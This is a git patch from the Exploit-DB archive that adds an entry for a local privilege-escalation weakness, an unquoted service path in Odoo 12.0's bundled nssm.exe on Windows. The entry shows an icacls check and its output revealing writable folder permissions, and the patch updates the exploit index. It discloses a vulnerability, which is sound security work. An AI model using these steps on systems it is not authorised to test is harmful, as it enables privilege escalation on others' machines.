From c3ea8f97decaeef221657439be0f7cfefe3c485c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 12 May 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-05-12

1 changes to exploits/shellcodes

Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
---
 exploits/windows/local/49857.txt | 24 ++++++++++++++++++++++++
 files_exploits.csv               |  1 +
 2 files changed, 25 insertions(+)
 create mode 100644 exploits/windows/local/49857.txt

diff --git a/exploits/windows/local/49857.txt b/exploits/windows/local/49857.txt
new file mode 100644
index 000000000..1361d7c1a
--- /dev/null
+++ b/exploits/windows/local/49857.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
+# Exploit Author: 1F98D
+# Vendor Homepage: https://www.odoo.com/
+# Software Link:  https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe
+# Tested Version: 12.0.20190101
+# Tested on OS: Windows 
+# Step to discover Unquoted Service Path:
+
+C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm"
+
+C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M)
+                                      NT SERVICE\TrustedInstaller:(I)(F)
+                                      NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                                      NT AUTHORITY\SYSTEM:(I)(F)
+                                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+                                      BUILTIN\Administrators:(I)(F)
+                                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+                                      BUILTIN\Users:(I)(RX)
+                                      BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
+                                      APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
+                                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
+                                      APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a16908adb..6f309a4f9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11323,6 +11323,7 @@ id,file,description,date,author,type,platform,port
 49850,exploits/windows/local/49850.txt,"DHCP Broadband 4.1.0.1503 - 'dhcpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
+49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139